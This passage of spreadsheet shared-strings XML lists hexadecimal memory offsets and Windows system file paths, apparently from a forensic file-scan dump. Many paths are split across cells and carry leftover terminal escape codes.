    <t>0xde9e7f80</t>
  </si>
  <si>
    <t>0xde9e81f8</t>
  </si>
  <si>
    <t>0xde9e83c0</t>
  </si>
  <si>
    <t>0xde9e84e0</t>
  </si>
  <si>
    <t>0xde9e8700</t>
  </si>
  <si>
    <t>0xde9e8920</t>
  </si>
  <si>
    <t>0xde9e8b40</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic.Compatibility\v4.0_10.0.0.0__b0</t>
  </si>
  <si>
    <t>3f5f7f11d50a3</t>
  </si>
  <si>
    <t>a\Microsoft</t>
  </si>
  <si>
    <t>.Visua</t>
  </si>
  <si>
    <t>lBasic.Compatibility.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e8d60</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic.Compatibility.Data\v4.0_10.0.0.</t>
  </si>
  <si>
    <t>0__b03f5f7f11</t>
  </si>
  <si>
    <t>d50a3a\Micr</t>
  </si>
  <si>
    <t>osoft.</t>
  </si>
  <si>
    <t>VisualBasic.Compatibility.Data.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e8f80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualC\v4.0_10.0.0.0__b03f5f7f11d50a3a\Mic</t>
  </si>
  <si>
    <t>rosoft.Visual</t>
  </si>
  <si>
    <t>C.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e91f8</t>
  </si>
  <si>
    <t>0xde9e9418</t>
  </si>
  <si>
    <t>0xde9e9700</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Workflow.Compiler\v4.0_4.0.0.0__31bf3856ad3</t>
  </si>
  <si>
    <t>64e35\Microso</t>
  </si>
  <si>
    <t>ft.Workflow</t>
  </si>
  <si>
    <t>.Compi</t>
  </si>
  <si>
    <t>ler.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e9868</t>
  </si>
  <si>
    <t>\Windows\System32\lltdapi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e9920</t>
  </si>
  <si>
    <t>0xde9e99f0</t>
  </si>
  <si>
    <t>\Windows\System32\lpremove.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e9b40</t>
  </si>
  <si>
    <t>0xde9e9d60</t>
  </si>
  <si>
    <t>0xde9e9f80</t>
  </si>
  <si>
    <t>0xde9ea0d0</t>
  </si>
  <si>
    <t>0xde9ea478</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ime_imetc10_help_31e933f572191d05.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ea8b8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Web.DynamicData\3.5.0.0__31bf3856ad364e35\System.Web.Dynamic</t>
  </si>
  <si>
    <t>Data.dll_x001B_[0K_x001B_</t>
  </si>
  <si>
    <t>[85G</t>
  </si>
  <si>
    <t>0xde9ead38</t>
  </si>
  <si>
    <t>0xde9eadf0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35\Microsoft.Man</t>
  </si>
  <si>
    <t>agementConsol</t>
  </si>
  <si>
    <t>0xde9eaf80</t>
  </si>
  <si>
    <t>0xde9eb1f8</t>
  </si>
  <si>
    <t>0xde9eb418</t>
  </si>
  <si>
    <t>0xde9eb580</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\searchfolder.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9eb638</t>
  </si>
  <si>
    <t>0xde9eb858</t>
  </si>
  <si>
    <t>0xde9eba78</t>
  </si>
  <si>
    <t>0xde9ebd60</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\Microsoft.MediaCenter.TV.Tuners.Interop\6.1.0.0__31bf3856ad364e35\Mic</t>
  </si>
  <si>
    <t>rosoft.MediaC</t>
  </si>
  <si>
    <t>enter.TV.Tu</t>
  </si>
  <si>
    <t>ners.I</t>
  </si>
  <si>
    <t>nterop.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ebf80</t>
  </si>
  <si>
    <t>0xde9ec218</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ehiWUapi\7f2e1868751ee2f653ea_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ecc98</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.Ink\7de7ebe4766820dc8201_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ed038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Discovery\v4.0_4.0.0.0__31bf3856a</t>
  </si>
  <si>
    <t>del.Di</t>
  </si>
  <si>
    <t>scovery.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ed2b0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Serialization.Formatters.Soap\v4.0_4.0</t>
  </si>
  <si>
    <t>.0.0__b03f5f7</t>
  </si>
  <si>
    <t>f11d50a3a\S</t>
  </si>
  <si>
    <t>ystem.</t>
  </si>
  <si>
    <t>Runtime.Serialization.Formatters.Soap.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ed418</t>
  </si>
  <si>
    <t>0xde9ed4d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System</t>
  </si>
  <si>
    <t>.Security.dll</t>
  </si>
  <si>
    <t>0xde9ed638</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\XsdBuildTask\v4.0_4.0.0.0__31bf3856ad364e35\XsdBuildT</t>
  </si>
  <si>
    <t>ask.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ed6f0</t>
  </si>
  <si>
    <t>0xde9ed910</t>
  </si>
  <si>
    <t>0xde9edb30</t>
  </si>
  <si>
    <t>0xde9ede18</t>
  </si>
  <si>
    <t>0xde9edf80</t>
  </si>
  <si>
    <t>0xde9ee038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Serialization\v4.0_4.0.0.0__b77a5c5619</t>
  </si>
  <si>
    <t>34e089\System</t>
  </si>
  <si>
    <t>.Runtime.Se</t>
  </si>
  <si>
    <t>rializ</t>
  </si>
  <si>
    <t>0xde9ee2b0</t>
  </si>
  <si>
    <t>0xde9ee4d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System</t>
  </si>
  <si>
    <t>.Numerics.dll</t>
  </si>
  <si>
    <t>0xde9ee6f0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_32\System.Printing\v4.0_4.0.0.0__31bf3856ad364e35\System.P</t>
  </si>
  <si>
    <t>rinting.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde9ee910</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Reflection.Context\v4.0_4.0.0.0__b77a5c561934e</t>
  </si>
  <si>
    <t>089\System.Re</t>
  </si>
  <si>
    <t>flection.co</t>
  </si>
  <si>
    <t>ntext.</t>
  </si>
  <si>
    <t>0xde9eebf8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Caching\v4.0_4.0.0.0__b03f5f7f11d50a3a</t>
  </si>
  <si>
    <t>\System.Runti</t>
  </si>
  <si>
    <t>me.Caching.</t>
  </si>
  <si>
    <t>0xde9eee18</t>
  </si>
  <si>
    <t>0xde9ef8f0</t>
  </si>
  <si>
    <t>0xde9efa80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\WindowsFormsIntegration\3.0.0.0__31bf3856ad364e35\WindowsFormsInteg</t>
  </si>
  <si>
    <t>ration.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xde9eff80</t>
  </si>
  <si>
    <t>0xde9f0038</t>
  </si>
  <si>
    <t>0xde9f07b8</t>
  </si>
  <si>
    <t>0xde9f0b08</t>
  </si>
  <si>
    <t>0xde9f0bc0</t>
  </si>
  <si>
    <t>0xde9f0d88</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\AltTab.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f11f8</t>
  </si>
  <si>
    <t>0xde9f1418</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Internal.Tasks.Dataflow\v4.0_4.0.0.0__b77a5</t>
  </si>
  <si>
    <t>c561934e089\M</t>
  </si>
  <si>
    <t>icrosoft.In</t>
  </si>
  <si>
    <t>ternal</t>
  </si>
  <si>
    <t>.Tasks.Dataflow.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f1638</t>
  </si>
  <si>
    <t>0xde9f1858</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.MediaCenter\6.1.0.0__31bf3856ad364e35\Microsoft.MediaCent</t>
  </si>
  <si>
    <t>er.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f1b40</t>
  </si>
  <si>
    <t>0xde9f1d60</t>
  </si>
  <si>
    <t>0xde9f1f80</t>
  </si>
  <si>
    <t>0xde9f21f8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Tasks.v4.0\v4.0_4.0.0.0__b03f5f7f11d5</t>
  </si>
  <si>
    <t>0a3a\Microsof</t>
  </si>
  <si>
    <t>t.Build.Tas</t>
  </si>
  <si>
    <t>ks.v4.</t>
  </si>
  <si>
    <t>0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f2418</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Build.Utilities\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build</t>
  </si>
  <si>
    <t>.Utilities.dl</t>
  </si>
  <si>
    <t>0xde9f2638</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Build.Utilities.v3.5\3.5.0.0__b03f5f7f11d50a3a\Microsoft.</t>
  </si>
  <si>
    <t>Build.Utiliti</t>
  </si>
  <si>
    <t>es.v3.5.dll</t>
  </si>
  <si>
    <t>0xde9f2920</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Utilities.v4.0\v4.0_4.0.0.0__b03f5f7f</t>
  </si>
  <si>
    <t>11d50a3a\Micr</t>
  </si>
  <si>
    <t>osoft.Build</t>
  </si>
  <si>
    <t>.Utili</t>
  </si>
  <si>
    <t>ties.v4.0.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f2b40</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\Microsoft.GroupPolicy.AdmTmplEditor\6.1.0.0__31bf3856ad364e35\Microso</t>
  </si>
  <si>
    <t>ft.GroupPolic</t>
  </si>
  <si>
    <t>y.AdmTmplEd</t>
  </si>
  <si>
    <t>itor.d</t>
  </si>
  <si>
    <t>0xde9f2d60</t>
  </si>
  <si>
    <t>0xde9f2f80</t>
  </si>
  <si>
    <t>0xde9f31f8</t>
  </si>
  <si>
    <t>0xde9f3418</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Engine\v4.0_4.0.0.0__b03f5f7f11d50a3a</t>
  </si>
  <si>
    <t>\Microsoft.Bu</t>
  </si>
  <si>
    <t>ild.Engine.</t>
  </si>
  <si>
    <t>0xde9f3700</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build</t>
  </si>
  <si>
    <t>.Framework.dl</t>
  </si>
  <si>
    <t>0xde9f3920</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build</t>
  </si>
  <si>
    <t>0xde9f3b40</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50</t>
  </si>
  <si>
    <t>a3a\Microsoft</t>
  </si>
  <si>
    <t>.Build.Fram</t>
  </si>
  <si>
    <t>ework.</t>
  </si>
  <si>
    <t>0xde9f3d60</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Build.Tasks\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Tas</t>
  </si>
  <si>
    <t>ks.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f3f80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Build.Tasks.v3.5\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Buil</t>
  </si>
  <si>
    <t>d.Tasks.v3.5.</t>
  </si>
  <si>
    <t>0xde9f4038</t>
  </si>
  <si>
    <t>0xde9f41f8</t>
  </si>
  <si>
    <t>0xde9f44e0</t>
  </si>
  <si>
    <t>0xde9f4700</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Micros</t>
  </si>
  <si>
    <t>oft.Build.dll</t>
  </si>
  <si>
    <t>0xde9f4920</t>
  </si>
  <si>
    <t>0xde9f4b40</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Conversion.v4.0\v4.0_4.0.0.0__b03f5f7</t>
  </si>
  <si>
    <t>rosoft.Buil</t>
  </si>
  <si>
    <t>d.Conv</t>
  </si>
  <si>
    <t>ersion.v4.0.dll_x001B_[0K_x001B_[137G</t>
  </si>
  <si>
    <t>0xde9f4d60</t>
  </si>
  <si>
    <t>0xde9f4f80</t>
  </si>
  <si>
    <t>0xde9f5038</t>
  </si>
  <si>
    <t>0xde9f52c0</t>
  </si>
  <si>
    <t>0xde9f54e0</t>
  </si>
  <si>
    <t>0xde9f5700</t>
  </si>
  <si>
    <t>0xde9f5920</t>
  </si>
  <si>
    <t>0xde9f5b40</t>
  </si>
  <si>
    <t>0xde9f5d60</t>
  </si>
  <si>
    <t>0xde9f5ec8</t>
  </si>
  <si>
    <t>0xde9f5f80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Activities.Build\v4.0_4.0.0.0__31bf3856ad36</t>
  </si>
  <si>
    <t>4e35\Microsof</t>
  </si>
  <si>
    <t>d.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f6208</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4C7</t>
  </si>
  <si>
    <t>F163ED126D5C3</t>
  </si>
  <si>
    <t>CB9457F68EC</t>
  </si>
  <si>
    <t>64E9E_x001B_</t>
  </si>
  <si>
    <t>0xde9f62c0</t>
  </si>
  <si>
    <t>\Windows\System32\NlsData0009.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f64e0</t>
  </si>
  <si>
    <t>0xde9f6648</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmtexas.inf_x86_neutral_c193921ec654db8b\mdmtexa</t>
  </si>
  <si>
    <t>0xde9f6700</t>
  </si>
  <si>
    <t>0xde9f6920</t>
  </si>
  <si>
    <t>0xde9f6b40</t>
  </si>
  <si>
    <t>0xde9f6d60</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehshell\6.1.0.0__31bf3856ad364e35\ehshell.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f6f80</t>
  </si>
  <si>
    <t>0xde9f71f8</t>
  </si>
  <si>
    <t>0xde9f74d0</t>
  </si>
  <si>
    <t>\Windows\System32\elslad.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f7638</t>
  </si>
  <si>
    <t>onfig.ni.exe.</t>
  </si>
  <si>
    <t>0xde9f76f0</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\269</t>
  </si>
  <si>
    <t>69811E3D01AC4</t>
  </si>
  <si>
    <t>4AB62601783</t>
  </si>
  <si>
    <t>F7AE6_x001B_</t>
  </si>
  <si>
    <t>0xde9f7910</t>
  </si>
  <si>
    <t>\Windows\System32\elsTrans.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f7a78</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP4DC2.tmp\System.DirectoryServices.Account</t>
  </si>
  <si>
    <t>Management.dl</t>
  </si>
  <si>
    <t>0xde9f7b30</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A58</t>
  </si>
  <si>
    <t>3E2A51BFBDC1E</t>
  </si>
  <si>
    <t>492A57B7C83</t>
  </si>
  <si>
    <t>25850_x001B_</t>
  </si>
  <si>
    <t>0xde9f7d50</t>
  </si>
  <si>
    <t>0xde9f81f8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{AA6994BF-7574-41A7-90E</t>
  </si>
  <si>
    <t>3-AECF09B3328</t>
  </si>
  <si>
    <t>0xde9f82b0</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Service\Unknown.Log_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f84d0</t>
  </si>
  <si>
    <t>\Windows\SoftwareDistribution\Download\4c05cb36bdc24ff9b174a5c207a159d38766a374_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f86f0</t>
  </si>
  <si>
    <t>\Windows\System32\NaturalLanguage6.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f8910</t>
  </si>
  <si>
    <t>\Windows\System32\NlsLexicons0009.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f8b30</t>
  </si>
  <si>
    <t>\Windows\System32\NlsData0000.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f8e18</t>
  </si>
  <si>
    <t>0xde9f91f8</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\elscore.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f92b0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\crypt32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f94d0</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f9b40</t>
  </si>
  <si>
    <t>0xde9f9bf8</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{832A7359-03FE-4E9A-8F7</t>
  </si>
  <si>
    <t>F-FB1F2BF35ED</t>
  </si>
  <si>
    <t>0xde9f9d60</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_branding_basebrd_en-us_51c0631d4347f350.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9f9e18</t>
  </si>
  <si>
    <t>\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\435</t>
  </si>
  <si>
    <t>07F87C1453B21</t>
  </si>
  <si>
    <t>87C030286C2</t>
  </si>
  <si>
    <t>D44AB_x001B_</t>
  </si>
  <si>
    <t>0xde9fa1f8</t>
  </si>
  <si>
    <t>0xde9fa2b0</t>
  </si>
  <si>
    <t>\Windows\System32\mssitlb.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9fa4d0</t>
  </si>
  <si>
    <t>0xde9fa9d8</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9fabf8</t>
  </si>
  <si>
    <t>\Windows\SoftwareDistribution\WuRedir\7971F918-A847-4430-9279-4A52D1EFE18D\wuredir.cab_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9fae18</t>
  </si>
  <si>
    <t>0xde9fbe18</t>
  </si>
  <si>
    <t>0xde9fc1e8</t>
  </si>
  <si>
    <t>0xde9fc310</t>
  </si>
  <si>
    <t>viders.ni.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9fc8e8</t>
  </si>
  <si>
    <t>0xde9fce48</t>
  </si>
  <si>
    <t>0xde9fd9e8</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP27C8.tmp\System.Management.Automation.dll</t>
  </si>
  <si>
    <t>0xde9fdc98</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_branding_shellbrd_be1f632087fb0947.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9fdf80</t>
  </si>
  <si>
    <t>\Windows\System32\NlsData0416.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9fe418</t>
  </si>
  <si>
    <t>0xde9fe7f8</t>
  </si>
  <si>
    <t>0xde9fea28</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_.net_clr_networking_0409_417ab2a4909264b0.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9feae0</t>
  </si>
  <si>
    <t>0xde9fec98</t>
  </si>
  <si>
    <t>0xde9fee58</t>
  </si>
  <si>
    <t>0xde9ff1f8</t>
  </si>
  <si>
    <t>0xde9ff418</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe.config_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ff638</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe.config_x001B_[0K_x001B_[81G</t>
  </si>
  <si>
    <t>0xde9ff920</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe.config_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ffb40</t>
  </si>
  <si>
    <t>0xde9ffd60</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\AspNetMMCExt\v4.0_4.0.0.0__b03f5f7f11d50a3a\AspNetMMC</t>
  </si>
  <si>
    <t>Ext.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9fff80</t>
  </si>
  <si>
    <t>0xdea00248</t>
  </si>
  <si>
    <t>0xdea00300</t>
  </si>
  <si>
    <t>0xdea005c8</t>
  </si>
  <si>
    <t>0xdea006e8</t>
  </si>
  <si>
    <t>0xdea00ad0</t>
  </si>
  <si>
    <t>0xdea00ec8</t>
  </si>
  <si>
    <t>0xdea00f80</t>
  </si>
  <si>
    <t>0xdea01360</t>
  </si>
  <si>
    <t>0xdea01748</t>
  </si>
  <si>
    <t>0xdea01a10</t>
  </si>
  <si>
    <t>0xdea01b30</t>
  </si>
  <si>
    <t>0xdea01f18</t>
  </si>
  <si>
    <t>0xdea02178</t>
  </si>
  <si>
    <t>0xdea02298</t>
  </si>
  <si>
    <t>0xdea02680</t>
  </si>
  <si>
    <t>0xdea029b0</t>
  </si>
  <si>
    <t>0xdea02a68</t>
  </si>
  <si>
    <t>0xdea02df8</t>
  </si>
  <si>
    <t>0xdea02f18</t>
  </si>
  <si>
    <t>0xdea03118</t>
  </si>
  <si>
    <t>0xdea03298</t>
  </si>
  <si>
    <t>0xdea03560</t>
  </si>
  <si>
    <t>0xdea03680</t>
  </si>
  <si>
    <t>0xdea03948</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_235_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea03a68</t>
  </si>
  <si>
    <t>0xdea03d98</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility</t>
  </si>
  <si>
    <t>\Desktop.ini_x001B_</t>
  </si>
  <si>
    <t>0xdea03e50</t>
  </si>
  <si>
    <t>0xdea041d0</t>
  </si>
  <si>
    <t>0xdea045b8</t>
  </si>
  <si>
    <t>0xdea04880</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_842_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea049a0</t>
  </si>
  <si>
    <t>0xdea04e50</t>
  </si>
  <si>
    <t>0xdea05300</t>
  </si>
  <si>
    <t>0xdea056e8</t>
  </si>
  <si>
    <t>0xdea05a18</t>
  </si>
  <si>
    <t>0xdea05ad0</t>
  </si>
  <si>
    <t>0xdea05d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_40_for_KB4483187~31bf3856ad364e35~x86~~11.2.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea05eb8</t>
  </si>
  <si>
    <t>0xdea06298</t>
  </si>
  <si>
    <t>0xdea06680</t>
  </si>
  <si>
    <t>0xdea06a68</t>
  </si>
  <si>
    <t>0xdea06df8</t>
  </si>
  <si>
    <t>0xdea06f18</t>
  </si>
  <si>
    <t>0xdea07038</t>
  </si>
  <si>
    <t>0xdea07298</t>
  </si>
  <si>
    <t>0xdea07680</t>
  </si>
  <si>
    <t>0xdea079b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-IE-Spelling-Parent-Package-English~31bf3856ad364</t>
  </si>
  <si>
    <t>e35~~~11.2.94</t>
  </si>
  <si>
    <t>12.0.mum_x001B_[0</t>
  </si>
  <si>
    <t>0xdea07a68</t>
  </si>
  <si>
    <t>0xdea07d30</t>
  </si>
  <si>
    <t>0xdea07e50</t>
  </si>
  <si>
    <t>0xdea081d0</t>
  </si>
  <si>
    <t>0xdea08498</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-IE-Hyphenation-Parent-Package-English~31bf3856ad</t>
  </si>
  <si>
    <t>364e35~~~11.2</t>
  </si>
  <si>
    <t>.9412.0.mum</t>
  </si>
  <si>
    <t>0xdea085b8</t>
  </si>
  <si>
    <t>0xdea089a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-BLB-Client-Package~31bf3856ad364e35~x86~en-US~6.</t>
  </si>
  <si>
    <t>0xdea08d98</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-IE-Spelling-Package-English~31bf3856ad364e35~x86</t>
  </si>
  <si>
    <t>~~6.3.9412.0.</t>
  </si>
  <si>
    <t>0xdea08e50</t>
  </si>
  <si>
    <t>0xdea09148</t>
  </si>
  <si>
    <t>0xdea09200</t>
  </si>
  <si>
    <t>0xdea094c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-IE-Hyphenation-Package-English~31bf3856ad364e35~</t>
  </si>
  <si>
    <t>x86~~6.3.9412</t>
  </si>
  <si>
    <t>.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea095e8</t>
  </si>
  <si>
    <t>0xdea099d0</t>
  </si>
  <si>
    <t>0xdea09d00</t>
  </si>
  <si>
    <t>0xdea09db8</t>
  </si>
  <si>
    <t>0xdea0a138</t>
  </si>
  <si>
    <t>0xdea0a400</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_686_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea0a520</t>
  </si>
  <si>
    <t>0xdea0a908</t>
  </si>
  <si>
    <t>0xdea0adb8</t>
  </si>
  <si>
    <t>0xdea0b038</t>
  </si>
  <si>
    <t>0xdea0b480</t>
  </si>
  <si>
    <t>0xdea0b7b0</t>
  </si>
  <si>
    <t>0xdea0b868</t>
  </si>
  <si>
    <t>0xdea0bc50</t>
  </si>
  <si>
    <t>0xdea0bf80</t>
  </si>
  <si>
    <t>0xdea0c038</t>
  </si>
  <si>
    <t>0xdea0c3b8</t>
  </si>
  <si>
    <t>0xdea0c6e8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-InternetExplorer-VistaPlus-Update~31bf3856ad364e</t>
  </si>
  <si>
    <t>0xdea0c7a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_135_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea0cc50</t>
  </si>
  <si>
    <t>0xdea0cf80</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_31_for_KB3124275~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea0d310</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_236_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea0d3c8</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_234_for_KB4486563~31bf3856ad364e35~x86~~6.1.1.4.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea0d7b0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_205_for_KB4054518~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xdea0dae0</t>
  </si>
  <si>
